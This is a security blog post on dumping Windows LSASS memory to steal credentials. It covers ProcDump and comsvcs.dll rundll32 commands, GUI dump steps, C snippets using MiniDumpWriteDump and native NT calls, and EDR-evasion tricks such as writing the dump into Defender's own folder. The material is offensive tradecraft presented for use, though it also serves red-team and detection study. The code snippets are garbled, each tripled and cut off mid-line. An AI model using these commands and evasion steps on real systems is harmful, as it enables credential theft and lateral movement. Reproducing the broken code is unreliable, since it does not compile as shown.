Shadows of LSASS Dumping

In this blog, we delve deep into the significance of the Local Security Authority Subsystem Service (LSASS) as a high-value target for adversaries, red teamers, and penetration testers alike. Responsible for enforcing security policies, handling authentication, and storing sensitive credentials in memory, LSASS presents a lucrative opportunity for attackers seeking to escalate privileges or move laterally within a compromised environment.

We begin by exploring why LSASS is so critical, highlighting its role in Windows security architecture and its appeal as a target. The blog then categorizes and analyzes various tools and techniques used to dump LSASS memory, including:

• Microsoft-signed tools that can be misused for stealthy access,

• Different Methods to dump lsass using Windows API calls

• Open-source utilities commonly leveraged in offensive operations,

• Custom-developed tools that exploit lesser-known methods to evade detection.

Finally, we examine real-world evasion tactics that continue to bypass even top-tier Endpoint Detection and Response (EDR) solutions. By dissecting the behavioral and technical weaknesses in modern security controls, we shed light on why LSASS dumping remains a persistent threat and a red-hot focus area in adversary emulation and detection engineering.

Why LSASS Is a Prime Target for Attackers?

The Local Security Authority Subsystem Service (LSASS) is a critical component of the Windows operating system responsible for enforcing security policies, handling user authentication, and managing sensitive information such as password hashes, Kerberos tickets, and access tokens. When a user logs into a Windows machine, LSASS securely stores the credentials in memory to facilitate seamless authentication processes across sessions and services. This centralized storage of authentication secrets makes LSASS a prime target for attackers, red teamers, and penetration testers seeking to extract credentials and gain unauthorized access to systems. By dumping LSASS memory, adversaries can retrieve plaintext passwords, NTLM hashes, and other authentication artifacts, enabling them to escalate privileges, perform lateral movement, or establish persistent access within an environment.

How Do Attackers Use Them?

The Local Security Authority Subsystem Service (LSASS) is a Windows process responsible for handling authentication, storing domain and local user credentials in memory during user logins. These credentials, including plaintext passwords, NTLM hashes, and Kerberos tickets, can be extracted if an attacker gains the necessary privileges on an endpoint. Accessing LSASS memory allows adversaries to harvest valuable credentials for lateral movement, privilege escalation, and domain dominance.

Instead of executing tools like Mimikatz directly on a compromised machine — which risks detection by antivirus or EDR — attackers increasingly opt to create LSASS memory dumps and exfiltrate them for offline analysis. This method is not only stealthier but also allows credential extraction to be performed outside the reach of endpoint protections.

Among the most well-known tools for credential extraction is Mimikatz, developed by Benjamin Delpy, which can directly read LSASS memory or parse dumped memory files to recover authentication data. Delpy’s research into Windows authentication internals has made Mimikatz a staple tool for red teamers and threat actors alike.

Understanding the Methods Behind LSASS Dumping:

Microsoft-Signed Binaries and Tools

Attackers often abuse trusted Microsoft-signed binaries to dump LSASS memory, exploiting the trust these binaries inherently have within the Windows ecosystem. This helps bypass security mechanisms like Application Whitelisting and some basic EDR heuristics.

1) ProcDump With Process Name

ProcDump is a Microsoft Sysinternals utility used to monitor and create memory dumps of processes. Attackers can use it to target LSASS by specifying the process name (lsass.exe).

procdump.exe -AcceptEula -ma lsass.exe lsass_dump.dmp

• -AcceptEula: Automatically accept the Microsoft Software License Terms.

• -ma: Writes a full memory dump.

• lsass.exe: Targets the LSASS process by name.

• lsass_dump.dmp: Output dump file.

Note: Most EDRs have built-in signatures and behavioral rules to flag ProcDump when targeting lsass.exe. Leaves clear forensic artifacts (file creation, command-line). EDRs are normally looking for .dmp extension on disk to detect the lsass dumping. ProcDump by default create .dmp extension user don’t have any control on it, we can change the name of file but not the extension which leads to detection.

2) ProcDump With Process ID

Instead of using the process name, you can supply the LSASS Process ID to ProcDump, which is more specific and sometimes used to evade name-based detection rules.

tasklist | findstr lsass.exe

procdump.exe -AcceptEula -ma 1444 lsass_dump.dmp

• -AcceptEula: Automatically accept the Microsoft Software License Terms.

• -ma: Writes a full memory dump.

• 1444: Lsass Process ID.

• lsass_dump.dmp: Output dump file

Note: Slightly stealthier than using process name (avoids static rules matching on lsass.exe). May bypass simplistic command-line detections. But leaves clear forensic artifacts (file creation, commandline). EDRs are normally looking for .dmp extension on disk to detect the lsass dumping. ProcDump by default create .dmp extension user don’t have any control on it, we can change the name of file but not the extension which leads to detection.

3) ProcDump With Clone Flag

Modern Windows supports a /clone flag that clones a process and dumps the clone’s memory. This can bypass some EDR hooks by not directly attaching to the original LSASS process.

tasklist | findstr lsass.exe

procdump.exe -AcceptEula -r -ma 1444 lsass_dump.dmp

• -AcceptEula: Automatically accept the Microsoft Software License Terms.

• -r: Uses a clone to create a dump.

• -ma: Writes a full memory dump.

• 1444: Lsass Process ID.

• lsass_dump.dmp: Output dump file.

4) Task Manager

Task Manager in Windows 10 and later allows users to create a dump file of LSASS via the GUI.

Steps:

• Press Ctrl + Shift + Esc to open Task Manager.

• Go to the “Details” tab. · Locate lsass.exe.

• Right-click → “Create dump file”.

The dump will be written to %TEMP%\lsass.dmp.

Note: Requires interactive session and administrative rights. Modern EDRs are highly monitored task manager lsass dumping activities. Modern EDRs detect LSASS dump via Windows Event Tracing or File System Access. Leaves clear file path and dump artifact in %TEMP%. Mostly Suitable and still worth to try when you have interactive session during penetration testing or red teaming activities.

5) Process Explorer

Process Explorer is another Microsoft Sysinternals tool that provides detailed process information and allows for memory dumps via the GUI.

Steps:

• Run Process Explorer as administrator.

• Find lsass.exe in the process list.

• Right-click → “Create Dump” → “Create Full Dump”.

• Save the output .dmp file.

Note: Requires interactive session and administrative rights. Modern EDRs detect LSASS dump via Windows Event Tracing or File System Access. Leaves clear file path and dump artifact on disk. Mostly Suitable and still worth to try when you have interactive session during penetration testing or red teaming activities.

6) Comsvcs.dll

comsvcs.dll is a signed Microsoft DLL that contains the MiniDump function, which can be invoked using rundll32.exe to dump LSASS memory. This technique is often abused because rundll32.exe is a trusted Windows binary.

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump C:\Users\Public\lsass.dmp full

Note: This method is favored in some red team scenarios due to its stealth and low signature footprint. However, newer EDRs are increasingly detecting its misuse. Command-line arguments are often logged and analyzed.

Open-Source Utility

1) Process Hacker

Process Hacker is a powerful open-source task manager and system monitoring tool often used by system administrators, security researchers, and unfortunately, also abused by adversaries. It provides deep visibility into running processes, services, memory usage, and allows direct interaction with system processes. User interaction is required to dump lsass. Most of the case less monitored by modern EDRs solutions and can be an effective during engagements.

Note: GUI-based interaction may bypass basic command-line monitoring. Allows direct memory access using native APIs, bypassing some userland hooks.

Custom Tool: Windows API calls to Dump Lsass Manual

1) MiniDumpWriteDump

MiniDumpWriteDump is a Windows API function provided by DbgHelp.dll that allows you to create a snapshot (minidump) of a process’s memory. This snapshot can include a variety of information like stack traces, loaded modules, and memory segments. It’s commonly used by debuggers, crash reporters, and attackers to extract sensitive data from processes.

Prototype:

BOOL MiniDumpWriteDump (
 HANDLE hProcess,
 DWORD ProcessId,
 HANDLE hFile,
 MINIDUMP_TYPE DumpType,
 PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
 PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
 PMINIDUMP_CALLBACK_INFORMATION CallbackParam
);

BOOL MiniDumpWriteDump (
 HANDLE hProcess,
 DWORD ProcessId,
 HANDLE hFile,
 MINIDUMP_TYPE DumpType,
 PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
 PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
 PMINIDUMP_CALLBACK_INFORMATION CallbackParam
);

BOOL MiniDumpWriteDump (
 HANDLE hProcess,
 DWORD ProcessId,
 HANDLE hFile,
 MINIDUMP_TYPE DumpType,
 PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
 PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
 PMINIDUMP_CALLBACK_INFORMATION CallbackParam
);

Code Snippet:

#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")
void DumpProcess(HANDLE hProcess, DWORD pid) {
 HANDLE hFile = CreateFileA("dump.dmp", GENERIC_WRITE, 0, nu
 if (hFile != INVALID_HANDLE_VALUE) {
   MiniDumpWriteDump (hProcess, pid, hFile, MiniDumpWithFullMemory, nullptr,nullptr);
 CloseHandle(hFile);
 }

#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")
void DumpProcess(HANDLE hProcess, DWORD pid) {
 HANDLE hFile = CreateFileA("dump.dmp", GENERIC_WRITE, 0, nu
 if (hFile != INVALID_HANDLE_VALUE) {
   MiniDumpWriteDump (hProcess, pid, hFile, MiniDumpWithFullMemory, nullptr,nullptr);
 CloseHandle(hFile);
 }

#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")
void DumpProcess(HANDLE hProcess, DWORD pid) {
 HANDLE hFile = CreateFileA("dump.dmp", GENERIC_WRITE, 0, nu
 if (hFile != INVALID_HANDLE_VALUE) {
   MiniDumpWriteDump (hProcess, pid, hFile, MiniDumpWithFullMemory, nullptr,nullptr);
 CloseHandle(hFile);
 }

Note: EDRs monitor MiniDumpWriteDump API calls and can detect this technique. Another drawback of this technique is it write dump directly on disk which can lead to detection but still threat actors are using this technique.

2) MiniDumpWriteDump With FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE

This variation uses specific file attributes when creating the dump file:

• FILE_ATTRIBUTE_TEMPORARY: Tells the system the file is temporary.

• FILE_FLAG_DELETE_ON_CLOSE: Automatically deletes the file when the handle is closed.

Used by malware to avoid creating a persistent dump file on disk, or to evade EDRs by minimizing forensic footprint.

Code Snippet:

HANDLE hFile = CreateFileA("temp.dmp", GENERIC_WRITE, 0, NULL, 
 FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE, NULL)
if (hFile != INVALID_HANDLE_VALUE) {
 MiniDumpWriteDump (hProcess, pid, hFile, MiniDumpWithFullMemory,NULL,NULL,NULL);
  // No need to delete the file – it's deleted automatically 
 CloseHandle(hFile);
}

HANDLE hFile = CreateFileA("temp.dmp", GENERIC_WRITE, 0, NULL, 
 FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE, NULL)
if (hFile != INVALID_HANDLE_VALUE) {
 MiniDumpWriteDump (hProcess, pid, hFile, MiniDumpWithFullMemory,NULL,NULL,NULL);
  // No need to delete the file – it's deleted automatically 
 CloseHandle(hFile);
}

HANDLE hFile = CreateFileA("temp.dmp", GENERIC_WRITE, 0, NULL, 
 FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE, NULL)
if (hFile != INVALID_HANDLE_VALUE) {
 MiniDumpWriteDump (hProcess, pid, hFile, MiniDumpWithFullMemory,NULL,NULL,NULL);
  // No need to delete the file – it's deleted automatically 
 CloseHandle(hFile);
}

Note: As compared to the above technique this will create dump in memory to avoid the on-disk detection but one of the drawbacks of using these parameters if the resources are not free then the operating system will write dump on disks instead of memory which can lead to detection, and it gives less control over dumps in memory.

3) MiniDumpWriteDump Callbacks

MiniDumpWriteDump will dump lsass process memory to disk, however it’s possible to use MINIDUMP_CALLBACK_INFORMATION callbacks to create a process minidump and store it memory, where we could encrypt it before dropping to disk or exfiltrate it over the network.

Callback Structure:

typedef struct _MINIDUMP_CALLBACK_INFORMATION {
 MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
 PVOID CallbackParam;
} MINIDUMP_CALLBACK_INFORMATION, *PMINIDUMP_CALLBACK_INFORMATION;

typedef struct _MINIDUMP_CALLBACK_INFORMATION {
 MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
 PVOID CallbackParam;
} MINIDUMP_CALLBACK_INFORMATION, *PMINIDUMP_CALLBACK_INFORMATION;

typedef struct _MINIDUMP_CALLBACK_INFORMATION {
 MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
 PVOID CallbackParam;
} MINIDUMP_CALLBACK_INFORMATION, *PMINIDUMP_CALLBACK_INFORMATION;

Code Snippet:

BOOL CALLBACK MiniDumpCallback(
 PVOID CallbackParam,
 const PMINIDUMP_CALLBACK_INPUT CallbackInput,
 PMINIDUMP_CALLBACK_OUTPUT CallbackOutput
) {
 if (CallbackInput->CallbackType == ModuleCallback) {
 CallbackOutput->ModuleWriteFlags &= ~ModuleWriteModule;
 }
 return TRUE;
}
MINIDUMP_CALLBACK_INFORMATION mci = {0};
mci.CallbackRoutine = (MINIDUMP_CALLBACK_ROUTINE)MiniDumpCallba
mci.CallbackParam = nullptr;
MiniDumpWriteDump(hProcess, pid, hFile, MiniDumpWithFullMemory,null,null,&mci);

BOOL CALLBACK MiniDumpCallback(
 PVOID CallbackParam,
 const PMINIDUMP_CALLBACK_INPUT CallbackInput,
 PMINIDUMP_CALLBACK_OUTPUT CallbackOutput
) {
 if (CallbackInput->CallbackType == ModuleCallback) {
 CallbackOutput->ModuleWriteFlags &= ~ModuleWriteModule;
 }
 return TRUE;
}
MINIDUMP_CALLBACK_INFORMATION mci = {0};
mci.CallbackRoutine = (MINIDUMP_CALLBACK_ROUTINE)MiniDumpCallba
mci.CallbackParam = nullptr;
MiniDumpWriteDump(hProcess, pid, hFile, MiniDumpWithFullMemory,null,null,&mci);

BOOL CALLBACK MiniDumpCallback(
 PVOID CallbackParam,
 const PMINIDUMP_CALLBACK_INPUT CallbackInput,
 PMINIDUMP_CALLBACK_OUTPUT CallbackOutput
) {
 if (CallbackInput->CallbackType == ModuleCallback) {
 CallbackOutput->ModuleWriteFlags &= ~ModuleWriteModule;
 }
 return TRUE;
}
MINIDUMP_CALLBACK_INFORMATION mci = {0};
mci.CallbackRoutine = (MINIDUMP_CALLBACK_ROUTINE)MiniDumpCallba
mci.CallbackParam = nullptr;
MiniDumpWriteDump(hProcess, pid, hFile, MiniDumpWithFullMemory,null,null,&mci);

Note: As compared to the above technique this will create dump in memory to avoid the on-disk detection and give full control over dumps in memory. Attacker can encrypt dumps before writing in disk to bypass on-disk detection or can exfiltrate dump directly on server without touching disk

4) Native API calls Dump

Instead of using the documented MiniDumpWriteDump, we can invoke low-level NT Native API functions such as: · NtQuerySystemInformation

• NtReadVirtualMemory

• ZwOpenProcess

• NtCreateFile

This provides more stealth, as these calls avoid instrumentation by security products that hook WinAPI functions. The attacker reads process memory manually and dumps it without using dbghelp.dll.

Code Snippet:

HANDLE hProc;
CLIENT_ID cid = { (HANDLE)pid, 0 };
OBJECT_ATTRIBUTES objAttr = { sizeof(OBJECT_ATTRIBUTES) };
NtOpenProcess(&hProc, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION,&objAttr, &cid);
// Allocate buffer and read memory manually
BYTE buffer[4096];
SIZE_T bytesRead;
NtReadVirtualMemory(hProc, (PVOID)baseAddr, buffer, sizeof(buffer),&byterRead);

HANDLE hProc;
CLIENT_ID cid = { (HANDLE)pid, 0 };
OBJECT_ATTRIBUTES objAttr = { sizeof(OBJECT_ATTRIBUTES) };
NtOpenProcess(&hProc, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION,&objAttr, &cid);
// Allocate buffer and read memory manually
BYTE buffer[4096];
SIZE_T bytesRead;
NtReadVirtualMemory(hProc, (PVOID)baseAddr, buffer, sizeof(buffer),&byterRead);

HANDLE hProc;
CLIENT_ID cid = { (HANDLE)pid, 0 };
OBJECT_ATTRIBUTES objAttr = { sizeof(OBJECT_ATTRIBUTES) };
NtOpenProcess(&hProc, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION,&objAttr, &cid);
// Allocate buffer and read memory manually
BYTE buffer[4096];
SIZE_T bytesRead;
NtReadVirtualMemory(hProc, (PVOID)baseAddr, buffer, sizeof(buffer),&byterRead);

Note: This technique allows attacker to dump lsass memory using native Api calls instead of using well-known API MiniDumpWriteDump. Although MDWD Api under hood call the same undocumented API but when we use directly native call, we can avoid detection working based on hooking in kernel32.dll and dbghelp.dll

Evasion Tactics and EDR struggle

1) System Informer

We explore a simple yet highly effective method for credential harvesting during internal penetration testing, leveraging an open-source utility called System Informer — formerly known as Process Hacker. The binary is digitally signed by Winsider Seminars & Solutions INC, which makes it more trustworthy to endpoint defenses and less likely to trigger security alerts. This technique is ideal for internal penetration testers or red teams simulating insider threats. Unlike traditional methods that trigger EDR/XDR alerts (e.g., comsvcs.dll, procdump, or MiniDumpWriteDump API usage), System Informer blends in due to its signed binary and trusted behavior profile.

Note: Under the hood this tool is using native dump technique. The benefit of using this tool it is signed by legitimate company and because of interactive most of the well-know EDRs vendors were not able to detect lsass dumping through it. This technique is effective during the engagements when you have interactive session.

2) Lsass Cloning and Dump

We discuss a stealthy method for dumping LSASS memory without triggering EDR alerts. Rather than interacting with the original LSASS process, the author forked a clone of the LSASS process, inheriting its memory access. By dumping the cloned process, the EDRs didn’t detect the action, successfully bypassing detection. This technique is especially useful in internal penetration tests where credential dumping is a goal, and EDRs are actively monitoring system activity. The method allows for undetected credential access.

3) Microsoft own directory Dump

When using Sysinternals 𝐩𝐫𝐨𝐜𝐝𝐮𝐦𝐩. 𝐞𝐱𝐞 (𝐬𝐢𝐠𝐧𝐞𝐝 𝐛𝐲 𝐌𝐢𝐜𝐫𝐨𝐬𝐨𝐟𝐭) to dump LSASS memory, Defender instantly detects and deletes the dump file. This happens because MDE actively watches for. 𝐝𝐦𝐩 file and command line execution.

𝐓𝐡𝐞 𝐄𝐯𝐚𝐬𝐢𝐨𝐧 𝐓𝐫𝐢𝐜𝐤

However, by writing the dump file inside Defender’s own directory using ProcDump, located at:

C:\𝐏𝐫𝐨𝐠𝐫𝐚𝐦 𝐅𝐢𝐥𝐞𝐬\𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐞𝐟𝐞𝐧𝐝𝐞𝐫 𝐀𝐝𝐯𝐚𝐧𝐜𝐞𝐝 𝐓𝐡𝐫𝐞𝐚𝐭 𝐏𝐫𝐨𝐭𝐞𝐜𝐭𝐢𝐨𝐧\𝐩𝐚𝐧𝐝𝐚.𝐜𝐮.𝐝𝐦p

Defender ignores the dump and does not scan or delete it.